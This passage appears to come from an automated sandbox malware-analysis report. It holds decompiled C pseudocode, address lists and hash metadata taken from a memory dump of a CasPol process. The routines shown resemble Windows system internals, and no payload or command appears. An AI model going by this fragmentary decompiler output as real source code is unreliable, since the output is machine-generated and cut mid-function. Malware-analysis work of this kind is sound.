                                                                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									__eflags = _t63;
                                                                                                                                                                                                                                                                                                									if(_t63 != 0) {
                                                                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                                                                										_t84 =  *_t63;
                                                                                                                                                                                                                                                                                                										__eflags = _t84;
                                                                                                                                                                                                                                                                                                										if(_t84 != 0) {
                                                                                                                                                                                                                                                                                                											_t84 =  *(_t84 + 4);
                                                                                                                                                                                                                                                                                                											__eflags = _t84;
                                                                                                                                                                                                                                                                                                											if(_t84 != 0) {
                                                                                                                                                                                                                                                                                                												 *0x181b1e0(_t63, _t82);
                                                                                                                                                                                                                                                                                                												 *_t84();
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                                                                											_t60 = _t82 + 8;
                                                                                                                                                                                                                                                                                                											 *(_t85 - 0x2c) = _t60;
                                                                                                                                                                                                                                                                                                											_t68 =  *_t60;
                                                                                                                                                                                                                                                                                                											_t80 = _t60[1];
                                                                                                                                                                                                                                                                                                											 *(_t85 - 0x28) = _t68;
                                                                                                                                                                                                                                                                                                											 *(_t85 - 0x24) = _t80;
                                                                                                                                                                                                                                                                                                											goto L10;
                                                                                                                                                                                                                                                                                                										} while (_t63 == 0);
                                                                                                                                                                                                                                                                                                										goto L40;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t69 = 0;
                                                                                                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                                                                                                									while(1) {
                                                                                                                                                                                                                                                                                                										 *(_t85 - 0x38) = _t69;
                                                                                                                                                                                                                                                                                                										__eflags = _t69 -  *0x18184c0;
                                                                                                                                                                                                                                                                                                										if(_t69 >=  *0x18184c0) {
                                                                                                                                                                                                                                                                                                											break;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										__eflags = _t63;
                                                                                                                                                                                                                                                                                                										if(_t63 != 0) {
                                                                                                                                                                                                                                                                                                											break;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										_t66 = E017F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                                                                                                                                                                                                                                										__eflags = _t66;
                                                                                                                                                                                                                                                                                                										if(_t66 == 0) {
                                                                                                                                                                                                                                                                                                											_t63 = 0;
                                                                                                                                                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											_t63 = _t66 + 0xfffffff4;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										 *(_t85 - 0x34) = _t63;
                                                                                                                                                                                                                                                                                                										_t69 = _t69 + 1;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t84 = _t84 + 1;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								__eflags = _t63;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                                                                                                                                							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                                                                                                                                                                                                                                							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                                                                							 *(_t85 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                							E0172922A(_t82);
                                                                                                                                                                                                                                                                                                							_t53 = E01747D50();
                                                                                                                                                                                                                                                                                                							__eflags = _t53;
                                                                                                                                                                                                                                                                                                							if(_t53 != 0) {
                                                                                                                                                                                                                                                                                                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t56 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags =  *_t56;
                                                                                                                                                                                                                                                                                                							if( *_t56 != 0) {
                                                                                                                                                                                                                                                                                                								_t56 = E017F8B58(_t82);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                                                                                                                                                                                                                                							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                                                                                                                                                                                                                                								__eflags = _t82 -  *0x18186c0; // 0x11607b0
                                                                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                									__eflags = _t82 -  *0x18186b8; // 0x0
                                                                                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                										_t79 = 0x18186bc;
                                                                                                                                                                                                                                                                                                										_t72 = 0x18186b8;
                                                                                                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									__eflags = _t56 | 0xffffffff;
                                                                                                                                                                                                                                                                                                									asm("lock xadd [edi], eax");
                                                                                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                										E01729240(_t68, _t82, _t82, _t84, __eflags);
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									_t79 = 0x18186c4;
                                                                                                                                                                                                                                                                                                									_t72 = 0x18186c0;
                                                                                                                                                                                                                                                                                                									L18:
                                                                                                                                                                                                                                                                                                									E01759B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L5;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x01783761
                                                                                                                                                                                                                                                                                                0x01783764
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783766
                                                                                                                                                                                                                                                                                                0x01783768
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a5
                                                                                                                                                                                                                                                                                                0x017837a7
                                                                                                                                                                                                                                                                                                0x017837ad
                                                                                                                                                                                                                                                                                                0x017837b0
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x017837bc
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376f
                                                                                                                                                                                                                                                                                                0x01783775
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783777
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783782
                                                                                                                                                                                                                                                                                                0x01783787
                                                                                                                                                                                                                                                                                                0x01783789
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x01783792
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x017291a3
                                                                                                                                                                                                                                                                                                0x017291a9
                                                                                                                                                                                                                                                                                                0x017291b0
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291bb
                                                                                                                                                                                                                                                                                                0x017291c0
                                                                                                                                                                                                                                                                                                0x017291c5
                                                                                                                                                                                                                                                                                                0x017291c7
                                                                                                                                                                                                                                                                                                0x017837da
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291d2
                                                                                                                                                                                                                                                                                                0x017291d5
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x017291d7
                                                                                                                                                                                                                                                                                                0x017291db
                                                                                                                                                                                                                                                                                                0x017291e1
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x017291fd
                                                                                                                                                                                                                                                                                                0x01729203
                                                                                                                                                                                                                                                                                                0x0172921e
                                                                                                                                                                                                                                                                                                0x01729223
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729223
                                                                                                                                                                                                                                                                                                0x01729205
                                                                                                                                                                                                                                                                                                0x01729208
                                                                                                                                                                                                                                                                                                0x0172920c
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291ee
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017291db
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729168

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7773403be8bceaef5f594f0ee73e0a6fa50854e75d95bc018e69291987b0b369
                                                                                                                                                                                                                                                                                                • Instruction ID: 196074d070416d58709f687636b611383bf0d599c4088f49b000563d6605e3f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7773403be8bceaef5f594f0ee73e0a6fa50854e75d95bc018e69291987b0b369
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0731CF71A002A5DFEB26EB6DC48CBADFBF1BB59318F2C814DC60467245C330A981CB52
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                			E01740050(void* __ecx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t64;
                                                                                                                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                                                                                                                				_t2 = _t61 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                                				L01759ED0(_t2, 1, 0);
                                                                                                                                                                                                                                                                                                				_t52 =  *(_t61 + 0x8c);
                                                                                                                                                                                                                                                                                                				_t4 = _t61 + 0x8c; // 0x8c
                                                                                                                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                                                                					_t44 = _t52;
                                                                                                                                                                                                                                                                                                					_t58 = _t52 & 0x00000001;
                                                                                                                                                                                                                                                                                                					_t24 = _t44;
                                                                                                                                                                                                                                                                                                					asm("lock cmpxchg [ebx], edx");
                                                                                                                                                                                                                                                                                                					_t52 = _t44;
                                                                                                                                                                                                                                                                                                				} while (_t52 != _t44);
                                                                                                                                                                                                                                                                                                				if(_t58 == 0) {
                                                                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                                                                					_pop(_t59);
                                                                                                                                                                                                                                                                                                					_pop(_t62);
                                                                                                                                                                                                                                                                                                					_pop(_t41);
                                                                                                                                                                                                                                                                                                					return L0176B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                                				_t47 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                                                                                                                                                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                                                                                					if( *_t30 == 0) {
                                                                                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                                                                					if( *_t31 != 0) {
                                                                                                                                                                                                                                                                                                						_t18 = _t61 + 0x78; // 0x78
                                                                                                                                                                                                                                                                                                						E017F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t52 =  *(_t61 + 0x5c);
                                                                                                                                                                                                                                                                                                					_t11 = _t61 + 0x78; // 0x78
                                                                                                                                                                                                                                                                                                					_t34 = L01759702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                                                                                                                                                                                                                                					_t24 = _t34 | 0xffffffff;
                                                                                                                                                                                                                                                                                                					asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                                					if((_t34 | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                                                						 *0x181b1e0(_t61);
                                                                                                                                                                                                                                                                                                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L4:
                                                                                                                                                                                                                                                                                                				_t31 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                                                0x017400b3
                                                                                                                                                                                                                                                                                                0x017400bc
                                                                                                                                                                                                                                                                                                0x017400c5
                                                                                                                                                                                                                                                                                                0x017400ca
                                                                                                                                                                                                                                                                                                0x0178c01e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178c02d
                                                                                                                                                                                                                                                                                                0x017400d5
                                                                                                                                                                                                                                                                                                0x017400d9
                                                                                                                                                                                                                                                                                                0x0178c03d
                                                                                                                                                                                                                                                                                                0x0178c046
                                                                                                                                                                                                                                                                                                0x0178c046
                                                                                                                                                                                                                                                                                                0x017400df
                                                                                                                                                                                                                                                                                                0x017400e2
                                                                                                                                                                                                                                                                                                0x017400ea
                                                                                                                                                                                                                                                                                                0x017400ef
                                                                                                                                                                                                                                                                                                0x017400f2
                                                                                                                                                                                                                                                                                                0x017400f6
                                                                                                                                                                                                                                                                                                0x01740111
                                                                                                                                                                                                                                                                                                0x01740117
                                                                                                                                                                                                                                                                                                0x01740117
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017400f6
                                                                                                                                                                                                                                                                                                0x017400d0
                                                                                                                                                                                                                                                                                                0x017400d0
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 66c7c54b4274d61f9f1047deb2565639f0b521973f691d0e220751e85c42f58b
                                                                                                                                                                                                                                                                                                • Instruction ID: d1b786680196d9776d841552ca93e0959514855789176ff83fe10b008eac12b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66c7c54b4274d61f9f1047deb2565639f0b521973f691d0e220751e85c42f58b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0318D31201B04CFD722CF28C844B9AF7E5FF89714F14456DEAA687BA0EB75A901CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                			E017690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                				intOrPtr* _v0;
                                                                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                                                                                                                                                                				signed int _t57;
                                                                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t59;
                                                                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                                                                                				char _t74;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t65 = __edx;
                                                                                                                                                                                                                                                                                                				_t57 = _a4;
                                                                                                                                                                                                                                                                                                				_t32 = __ecx;
                                                                                                                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                                                                                                                				_t3 = _t32 + 0x14c; // 0x14c
                                                                                                                                                                                                                                                                                                				_t70 = _t3;
                                                                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                                                                				_t72 =  *_t70;
                                                                                                                                                                                                                                                                                                				while(_t72 != _t70) {
                                                                                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                                                                                                                                                                                                                                						L24:
                                                                                                                                                                                                                                                                                                						_t72 =  *_t72;
                                                                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t30 = _t72 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                                					if(L0177D4F0(_t30, _t65, _t57) == _t57) {
                                                                                                                                                                                                                                                                                                						return 0xb7;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t65 = _v8;
                                                                                                                                                                                                                                                                                                					goto L24;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t61 = _t57;
                                                                                                                                                                                                                                                                                                				_push( &_v12);
	_t66 = 0x10;
	if(L0175E5E0(_t57, _t66) < 0) {
		return 0x216;
	}
	_t73 = L01744620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
	if(_t73 == 0) {
		_t38 = 0xe;
		return _t38;
	}
	_t9 = _t73 + 0x10; // 0x10
	 *((intOrPtr*)(_t73 + 0xc)) = _t57;
	E0176F3E0(_t9, _v8, _t57);
	_t41 =  *_t70;
	if( *((intOrPtr*)(_t41 + 4)) != _t70) {
		_t62 = 3;
		asm("int 0x29");
		_push(_t62);
		_push(_t57);
		_push(_t73);
		_push(_t70);
		_t71 = _t62;
		_t74 = 0;
		_v36 = 0;
		_t63 = E0175A2F0(_t62, _t71, 1, 6,  &_v36);
		if(_t63 == 0) {
			L20:
			_t44 = 0x57;
			return _t44;
		}
		_t45 = _v12;
		_t58 = 0x1c;
		if(_t45 < _t58) {
			goto L20;
		}
		_t69 = _t45 / _t58;
		if(_t69 == 0) {
			L19:
			return 0xe8;
		}
		_t59 = _v0;
		do {
			if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
				goto L18;
			}
			_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
			 *_t59 = _t49;
			if( *_t49 != 0x53445352) {
				goto L18;
			}
			 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
			return 0;
			L18:
			_t63 = _t63 + 0x1c;
			_t74 = _t74 + 1;
		} while (_t74 < _t69);
		goto L19;
	}
	 *_t73 = _t41;
	 *((intOrPtr*)(_t73 + 4)) = _t70;
	 *((intOrPtr*)(_t41 + 4)) = _t73;
	 *_t70 = _t73;
	 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
	return 0;
}

                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0176917c
                                                                                                                                                                                                                                                                                                0x01769180
                                                                                                                                                                                                                                                                                                0x017691b5
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691b5
                                                                                                                                                                                                                                                                                                0x01769182
                                                                                                                                                                                                                                                                                                0x01769185
                                                                                                                                                                                                                                                                                                0x01769189
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0176918e
                                                                                                                                                                                                                                                                                                0x01769190
                                                                                                                                                                                                                                                                                                0x01769198
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691a0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691ad
                                                                                                                                                                                                                                                                                                0x017691ad
                                                                                                                                                                                                                                                                                                0x017691b0
                                                                                                                                                                                                                                                                                                0x017691b1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01769185
                                                                                                                                                                                                                                                                                                0x0176911a
                                                                                                                                                                                                                                                                                                0x0176911c
                                                                                                                                                                                                                                                                                                0x0176911f
                                                                                                                                                                                                                                                                                                0x01769125
                                                                                                                                                                                                                                                                                                0x01769127
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                                                                                                                • Instruction ID: f841151062a43f2d70b0b423240ced7042a294ed31ecba1e3057d9f0eadf2431
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0218071A00205EFDB21DF59C844AAAFBFCEF54714F1488AAEA45A7200D730ED04CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                                                                                                                			E01753B7A(void* __ecx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t17 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                				_v12 = 1;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x18184c0 * 0x4c;
                                                                                                                                                                                                                                                                                                				_t41 = __ecx;
                                                                                                                                                                                                                                                                                                				_t35 = L01744620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18184c0 * 0x4c);
                                                                                                                                                                                                                                                                                                				if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                					_t44 = 0xc0000017;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_push( &_v8);
                                                                                                                                                                                                                                                                                                					_push(_v8);
                                                                                                                                                                                                                                                                                                					_push(_t35);
                                                                                                                                                                                                                                                                                                					_push(4);
                                                                                                                                                                                                                                                                                                					_push( &_v12);
                                                                                                                                                                                                                                                                                                					_push(0x6b);
                                                                                                                                                                                                                                                                                                					_t44 = E0176AA90();
                                                                                                                                                                                                                                                                                                					_v20 = _t44;
                                                                                                                                                                                                                                                                                                					if(_t44 >= 0) {
                                                                                                                                                                                                                                                                                                						E0176FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18184c0 * 0xc);
                                                                                                                                                                                                                                                                                                						_t38 = _t35;
                                                                                                                                                                                                                                                                                                						if(_t35 < _v8 + _t35) {
                                                                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                                                                                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                                                                                                                                                                                                                                							} while (_t38 < _v8 + _t35);
                                                                                                                                                                                                                                                                                                							_t44 = _v20;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t26 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                                                                                                                                                                                                                                				}
